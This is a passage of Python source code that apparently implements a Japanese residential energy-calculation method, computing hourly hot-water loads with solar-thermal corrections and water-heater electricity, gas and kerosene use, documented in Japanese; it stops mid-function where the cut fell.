def calc_hotwater_load(n_p, region, sol_region, has_bath, bath_function, pipe_diameter, kitchen_watersaving_A,
kitchen_watersaving_C, shower_watersaving_A, shower_watersaving_B, washbowl_watersaving_C,
bath_insulation,
type=None, ls_type=None, A_sp=None, P_alpha_sp=None, P_beta_sp=None, W_tnk_ss=None,
hotwater_use=None, heating_flag_d=None, A_col=None, P_alpha=None, P_beta=None, V_fan_P0=None,
d0=None, d1=None, m_fan_test=None, W_tnk_ass=None
):
"""給湯負荷の計算
Args:
n_p(float): 仮想居住人数 (人)
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分(1-5)
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
pipe_diameter(str): ヘッダー分岐後の径
kitchen_watersaving_A(bool): 台所水栓の手元止水機能の有無
kitchen_watersaving_C(bool): 台所水栓の水優先吐水機能の有無
shower_watersaving_A(bool): 浴室シャワー水栓の手元止水機能の有無
shower_watersaving_B(bool): 浴室シャワー水栓の小流量吐水機能の有無
washbowl_watersaving_C(bool): 洗面水栓の水優先吐水機能の有無
bath_insulation(bool): 浴槽の断熱の有無
type(str, optional): 太陽熱利用設備の種類 (液体集熱式,空気集熱式,None) (Default value = None)
ls_type(str, optional): 液体集熱式太陽熱利用設備の種類 (太陽熱温水器,ソーラーシステム) (Default value = None)
A_sp(float, optional): 太陽熱集熱部の有効集熱面積 (m2) (Default value = None)
P_alpha_sp(float, optional): 太陽熱集熱部の方位角 (°) (Default value = None)
P_beta_sp(float, optional): 太陽熱集熱部の傾斜角 (°) (Default value = None)
W_tnk_ss(float, optional): ソーラーシステムのタンク容量 (L) (Default value = None)
hotwater_use(bool, optional): 空気集熱式太陽熱利用設備が給湯部を有する場合はTrue (Default value = None)
heating_flag_d(ndarray, optional): 暖房日 (Default value = None)
A_col(tuple, optional): 集熱器群の面積 (m2) (Default value = None)
P_alpha(float, optional): 方位角 (°) (Default value = None)
P_beta(float, optional): 傾斜角 (°) (Default value = None)
V_fan_P0(float, optional): 空気搬送ファンの送風機特性曲線において機外静圧をゼロとしたときの空気搬送ファンの風量 (m3/h) (Default value = None)
d0(tuple, optional): 集熱器群を構成する集熱器の集熱効率特性線図一次近似式の切片 (-) (Default value = None)
d1(tuple, optional): 集熱器群を構成する集熱器の集熱効率特性線図一次近似式の傾き (W/(m2K)) (Default value = None)
m_fan_test(tuple, optional): 集熱器群を構成する集熱器の集熱性能試験時における単位面積当たりの空気の質量流量 (kg/(s・m2)) (Default value = None)
W_tnk_ass(float, optional): タンク容量 (L) (Default value = None)
Returns:
dict: 1日当たりの給湯設備付加
"""
# 生活スケジュール
schedule = load_schedule()
schedule_hw = get_schedule_hw(schedule)
# 外部環境
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
# ----- 14. 夜間平均外気温度 -----
# 夜間平均外気温度 (℃) (15)
Theta_ex_Nave_d = get_Theta_ex_Nave_d(Theta_ex_d_t)
# ----- 13. 日平均外気温度 -----
# 日平均外気温度 (℃) (14)
theta_ex_d_Ave_d = get_theta_ex_d_Ave_d(Theta_ex_d_t)
# ----- 12. 日平均給水温度 -----
# 期間平均外気温度 (℃) (13)
Theta_ex_prd_Ave_d = get_Theta_ex_prd_Ave_d(theta_ex_d_Ave_d)
# 日平均給水温度 (℃) (12)
Theta_wtr_d = get_Theta_wtr_d(region, Theta_ex_prd_Ave_d)
# ----- 11. 浴槽沸かし直しによる給湯熱負荷 -----
# 浴槽沸かし直しによる給湯熱負荷 (MJ/h) (10)
L_ba_d_t = calc_L_ba_d_t(bath_insulation, schedule_hw, has_bath, theta_ex_d_Ave_d, n_p)
# ----- 10. 基準給湯量 -----
# 基準給湯量 (L/h) (7)
W_k_d_t = calc_W_k_d_t(n_p, schedule_hw)
W_s_d_t = calc_W_s_d_t(n_p, schedule_hw, has_bath)
W_w_d_t = calc_W_w_d_t(n_p, schedule_hw)
W_b1_d_t = calc_W_b1_d_t(n_p, schedule_hw, has_bath, bath_function)
W_b2_d_t = calc_W_b2_d_t(n_p, schedule_hw, has_bath, bath_function)
# 浴槽水栓さし湯時における基準給湯量 (L/h) (9)
W_ba1_d_t = calc_W_ba1_d_t(bath_function, L_ba_d_t, Theta_wtr_d)
# ----- 9. 節湯補正給湯量 -----
# 節湯補正給湯量 (L/h) (6)
W_dash_k_d_t = calc_W_dash_k_d_t(W_k_d_t, kitchen_watersaving_A, kitchen_watersaving_C, pipe_diameter, Theta_wtr_d)
W_dash_s_d_t = calc_W_dash_s_d_t(W_s_d_t, shower_watersaving_A, shower_watersaving_B, pipe_diameter)
W_dash_w_d_t = calc_W_dash_w_d_t(W_w_d_t, washbowl_watersaving_C, pipe_diameter, Theta_wtr_d)
W_dash_b1_d_t = calc_W_dash_b1_d_t(W_b1_d_t, pipe_diameter)
W_dash_b2_d_t = calc_W_dash_b2_d_t(W_b2_d_t)
W_dash_ba1_d_t = calc_W_dash_ba1_d_t(W_ba1_d_t, pipe_diameter)
# ----- 8. 節湯補正給湯熱負荷 -----
# 基準給湯温度 (℃)
Theta_sw_k = get_Theta_sw_k()
Theta_sw_s = get_Theta_sw_s()
Theta_sw_w = get_Theta_sw_w()
# 節湯補正給湯熱負荷 (MJ/h) (5)
L_dash_k_d_t = get_L_dash_k_d_t(W_dash_k_d_t, Theta_sw_k, Theta_wtr_d)
L_dash_s_d_t = get_L_dash_s_d_t(W_dash_s_d_t, Theta_sw_s, Theta_wtr_d)
L_dash_w_d_t = get_L_dash_w_d_t(W_dash_w_d_t, Theta_sw_w, Theta_wtr_d)
L_dash_b1_d_t, L_dash_b2_d_t = get_L_dash_bx_d_t(W_dash_b1_d_t, W_dash_b2_d_t, Theta_wtr_d, has_bath, bath_function)
L_dash_ba1_d_t, L_dash_ba2_d_t = get_L_dash_bax_d_t(W_dash_ba1_d_t, Theta_wtr_d, L_ba_d_t, has_bath, bath_function)
# ----- 7. 太陽熱補正給湯熱負荷 -----
# 太陽熱利用給湯設備による補正集熱量
L_sun_d_t = calc_L_sun_d_t(
region=region,
sol_region=sol_region,
solar_device=type,
ls_type=ls_type,
A_sp=A_sp,
P_alpha_sp=P_alpha_sp,
P_beta_sp=P_beta_sp,
W_tnk_ss=W_tnk_ss,
hotwater_use=hotwater_use,
heating_flag_d=heating_flag_d,
A_col=A_col,
P_alpha=P_alpha,
P_beta=P_beta,
V_fan_P0=V_fan_P0,
d0=d0,
d1=d1,
m_fan_test=m_fan_test,
W_tnk_ass=W_tnk_ass,
Theta_wtr_d=Theta_wtr_d,
L_dash_k_d_t=L_dash_k_d_t,
L_dash_s_d_t=L_dash_s_d_t,
L_dash_w_d_t=L_dash_w_d_t,
L_dash_b1_d_t=L_dash_b1_d_t,
L_dash_b2_d_t=L_dash_b2_d_t,
L_dash_ba1_d_t=L_dash_ba1_d_t
)
# 太陽熱補正給湯熱負荷
L_dashdash_k_d_t = calc_L_dashdash_k_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_s_d_t = calc_L_dashdash_s_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_w_d_t = calc_L_dashdash_w_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_b1_d_t = calc_L_dashdash_b1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_b2_d_t = calc_L_dashdash_b2_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_ba1_d_t = calc_L_dashdash_ba1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_ba2_d_t = get_L_dashdash_ba2_d_t(L_dash_ba2_d_t)
print('L_ba = {}'.format(np.sum(L_ba_d_t)))
print('W_k = {}'.format(np.sum(W_k_d_t)))
print('W_s = {}'.format(np.sum(W_s_d_t)))
print('W_w = {}'.format(np.sum(W_w_d_t)))
print('W_b1 = {}'.format(np.sum(W_b1_d_t)))
print('W_b2 = {}'.format(np.sum(W_b2_d_t)))
print('W_ba1 = {}'.format(np.sum(W_ba1_d_t)))
print('W_dash_k = {}'.format(np.sum(W_dash_k_d_t)))
print('W_dash_s = {}'.format(np.sum(W_dash_s_d_t)))
print('W_dash_w = {}'.format(np.sum(W_dash_w_d_t)))
print('W_dash_b1 = {}'.format(np.sum(W_dash_b1_d_t)))
print('W_dash_b2 = {}'.format(np.sum(W_dash_b2_d_t)))
print('W_dash_ba1 = {}'.format(np.sum(W_dash_ba1_d_t)))
print('L_dash_k = {}'.format(np.sum(L_dash_k_d_t)))
print('L_dash_s = {}'.format(np.sum(L_dash_s_d_t)))
print('L_dash_w = {}'.format(np.sum(L_dash_w_d_t)))
print('L_dash_b1 = {}'.format(np.sum(L_dash_b1_d_t)))
print('L_dash_b2 = {}'.format(np.sum(L_dash_b2_d_t)))
print('L_dash_ba1 = {}'.format(np.sum(L_dash_ba1_d_t)))
print('L_dash_ba2 = {}'.format(np.sum(L_dash_ba2_d_t)))
print('L_dashdash_k = {}'.format(np.sum(L_dashdash_k_d_t)))
print('L_dashdash_s = {}'.format(np.sum(L_dashdash_s_d_t)))
print('L_dashdash_w = {}'.format(np.sum(L_dashdash_w_d_t)))
print('L_dashdash_b1 = {}'.format(np.sum(L_dashdash_b1_d_t)))
print('L_dashdash_b2 = {}'.format(np.sum(L_dashdash_b2_d_t)))
print('L_dashdash_ba1 = {}'.format(np.sum(L_dashdash_ba1_d_t)))
print('L_dashdash_ba2 = {}'.format(np.sum(L_dashdash_ba2_d_t)))
return {
'L_dash_k_d_t': L_dash_k_d_t,
'L_dash_s_d_t': L_dash_s_d_t,
'L_dash_w_d_t': L_dash_w_d_t,
'L_dash_b1_d_t': L_dash_b1_d_t,
'L_dash_b2_d_t': L_dash_b2_d_t,
'L_dash_ba1_d_t': L_dash_ba1_d_t,
'L_dash_ba2_d_t': L_dash_ba2_d_t,
'L_dashdash_k_d_t': L_dashdash_k_d_t,
'L_dashdash_s_d_t': L_dashdash_s_d_t,
'L_dashdash_w_d_t': L_dashdash_w_d_t,
'L_dashdash_b1_d_t': L_dashdash_b1_d_t,
'L_dashdash_b2_d_t': L_dashdash_b2_d_t,
'L_dashdash_ba1_d_t': L_dashdash_ba1_d_t,
'L_dashdash_ba2_d_t': L_dashdash_ba2_d_t,
'W_dash_k_d_t': W_dash_k_d_t,
'W_dash_s_d_t': W_dash_s_d_t,
'W_dash_w_d_t': W_dash_w_d_t,
'W_dash_b1_d_t': W_dash_b1_d_t,
'W_dash_b2_d_t': W_dash_b2_d_t,
'W_dash_ba1_d_t': W_dash_ba1_d_t,
'theta_ex_d_Ave_d': theta_ex_d_Ave_d,
'Theta_ex_Nave_d': Theta_ex_Nave_d
}
def calc_E_E_W_d_t(n_p, L_HWH, heating_flag_d, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備の消費電力量 (1)
Args:
n_p(float): 仮想居住人数 (人)
L_HWH(ndarray): 温水暖房用熱源機の熱負荷
heating_flag_d(ndarray): 暖房日
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分(1-5)
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
Returns:
ndarray: 1日当たりの給湯設備の消費電力量 (kWh/d)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及 び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
if HW['hw_type'] == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1時間当たりの給湯機の消費電力量 (kWh/h)
E_E_hs_d_t = calc_E_E_hs_d_t(
hw_type=HW['hw_type'],
bath_function=bath_function,
hybrid_category=HW['hybrid_category'],
package_id=HW.get('package_id'),
hybrid_param=HW.get('hybrid_param'),
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
W_dash_k_d_t=hotwater_load['W_dash_k_d_t'],
W_dash_s_d_t=hotwater_load['W_dash_s_d_t'],
W_dash_w_d_t=hotwater_load['W_dash_w_d_t'],
W_dash_b1_d_t=hotwater_load['W_dash_b1_d_t'],
W_dash_b2_d_t=hotwater_load['W_dash_b2_d_t'],
W_dash_ba1_d_t=hotwater_load['W_dash_ba1_d_t'],
theta_ex_d_Ave_d=hotwater_load['theta_ex_d_Ave_d'],
Theta_ex_Nave_d=hotwater_load['Theta_ex_Nave_d'],
L_HWH=L_HWH,
CO2HP=HW['CO2HP'] if 'CO2HP' in HW else None
)
# 太陽利用設備の補機の消費電力量
E_E_aux_ss_d_t = calc_E_E_aux_ss_d_t(
SHC=SHC,
region=region,
sol_region=sol_region,
heating_flag_d=heating_flag_d
)
# 1時間当たりの給湯設備の消費電力量(1)
E_E_W_d_t = E_E_hs_d_t + E_E_aux_ss_d_t
return E_E_W_d_t
def calc_E_E_aux_ss_d_t(SHC, region=None, sol_region=None, heating_flag_d=None):
"""1時間当たりの補機の消費電力量 (kWh/h)
Args:
SHC(dict): 太陽熱利用設備の仕様
region(int, optional): 省エネルギー地域区分 (Default value = None)
sol_region(int, optional): 年間の日射地域区分 (Default value = None)
heating_flag_d(ndarray, optional): 暖房日 (Default value = None)
Returns:
ndarray: 1時間当たりの補機の消費電力量 (kWh/h)
"""
if SHC is None:
return np.zeros(24 * 365)
elif SHC['type'] == '液体集熱式':
# 第九章「自然エネルギー利用設備」第二節「液体集熱式太陽熱利用設備」の算定方法により定まる
# 1時間当たりの補機の消費電力量 (kWh/h)
return lss.calc_E_E_lss_aux_d_t(
ls_type=SHC['ls_type'],
pmp_type='上記以外の機種',
P_alpha_sp=SHC['P_alpha_sp'],
P_beta_sp=SHC['P_beta_sp'],
region=region,
sol_region=sol_region
)
elif SHC['type'] == '空気集熱式':
# 第九章「自然エネルギー利用設備」第三節「空気集熱式太陽熱利用設備」の算定方法により定まる
# 1時間当たりの補機の消費電力量のうちの給湯設備への付加分 (kWh/h)
return ass.calc_E_E_W_aux_ass_d_t(
hotwater_use=SHC['hotwater_use'],
heating_flag_d=heating_flag_d,
region=region,
sol_region=sol_region,
P_alpha=SHC['P_alpha'],
P_beta=SHC['P_beta'],
A_col=SHC['A_col'],
V_fan_P0=SHC['V_fan_P0'],
m_fan_test=SHC['m_fan_test'],
d0=SHC['d0'],
d1=SHC['d1'],
fan_sso=SHC['fan_sso'],
fan_type=SHC['fan_type'],
pump_sso=SHC['pump_sso']
)
else:
raise ValueError(SHC['type'])
# ============================================================================
# 5.2 ガス消費量
# ============================================================================
def calc_E_G_W_d_t(n_p, L_HWH, heating_flag_d, A_A, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備のガス消費量 (MJ/h) (2)
Args:
n_p(float): 仮想居住人数
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
A_A(float): 床面積の合計[m^2]
region(int): 地域区分
sol_region(int): 年間の日射地域区分
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
heating_flag_d: returns: 1時間当たりの給湯設備のガス消費量 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯設備のガス消費量 (MJ/h)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及 び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1日当たりの給湯機のガス消費量
E_G_hs_d = calc_E_G_hs_d(
hw_type=HW['hw_type'],
hybrid_category=HW['hybrid_category'],
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
bath_function=bath_function,
package_id=HW.get('package_id'),
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
W_dash_k_d_t=hotwater_load['W_dash_k_d_t'],
W_dash_s_d_t=hotwater_load['W_dash_s_d_t'],
W_dash_w_d_t=hotwater_load['W_dash_w_d_t'],
W_dash_b1_d_t=hotwater_load['W_dash_b1_d_t'],
W_dash_b2_d_t=hotwater_load['W_dash_b2_d_t'],
W_dash_ba1_d_t=hotwater_load['W_dash_ba1_d_t'],
Theta_ex_Ave=hotwater_load['theta_ex_d_Ave_d'],
Theta_ex_Nave=hotwater_load['Theta_ex_Nave_d'],
L_HWH=L_HWH,
hybrid_param=HW.get('hybrid_param')
)
return E_G_hs_d
# ============================================================================
# 5.3 灯油消費量
# ============================================================================
def calc_E_K_W_d_t(n_p, L_HWH, heating_flag_d, A_A, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備の灯油消費量 (MJ/h) (3)
Args:
n_p(float): 仮想居住人数
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
A_A(float): 床面積の合計[m^2]
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
heating_flag_d: returns: 1時間当たりの給湯設備の灯油消費量 (MJ/h) (3)
Returns:
ndarray: 1時間当たりの給湯設備の灯油消費量 (MJ/h) (3)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及 び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1時間当たりの給湯機の灯油消費量 (MJ/h)
E_k_hs_d_t = calc_E_K_hs_d_t(
hw_type=HW['hw_type'],
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
bath_function=bath_function,
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
theta_ex_d_Ave_d=hotwater_load['theta_ex_d_Ave_d']
)
return E_k_hs_d_t
# ============================================================================
# 5.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def get_E_M_W_d_t():
"""1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量
Args:
Returns:
ndarray: 1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量
"""
# 1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量は0とする
return np.zeros(24 * 365)
# ============================================================================
# 6. 給湯機のエネルギー消費量
# ============================================================================
def calc_E_E_hs_d_t(hw_type, bath_function, package_id, hybrid_param, hybrid_category, e_rtd, e_dash_rtd, Theta_ex_Nave_d, W_dash_k_d_t, W_dash_s_d_t,
W_dash_w_d_t,
W_dash_b1_d_t,
W_dash_b2_d_t, W_dash_ba1_d_t, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t,
L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t, L_HWH, CO2HP):
"""1時間当たりの給湯機の消費電力量 (kWh/h)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
bath_function(str): 給湯機の種類
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
package_id(str): パッケージID
hybrid_param(dic): ハイブリッドパラメーター
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
Theta_ex_Nave_d(ndarray): 夜間平均外気温 (℃)
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/d)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/d)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/d)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/d)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/d)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/d)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
CO2HP(dict): CO2HPのパラメーター
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (MJ/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.calc_E_E_hs_d_t(
W_dash_k_d_t=W_dash_k_d_t,
W_dash_s_d_t=W_dash_s_d_t,
W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.calc_E_E_hs_d_t(W_dash_k_d_t=W_dash_k_d_t, W_dash_s_d_t=W_dash_s_d_t, W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t, W_dash_ba1_d_t=W_dash_ba1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t, theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t)
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.calc_E_E_hs_d_t(
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
e_rtd=e_rtd,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
theta_ex_Nave_d=Theta_ex_Nave_d,
CO2HP=CO2HP
)
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.calc_E_E_hs_d_t(
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return hybrid_gas.calc_E_E_hs_d_t(
hybrid_category=hybrid_category,
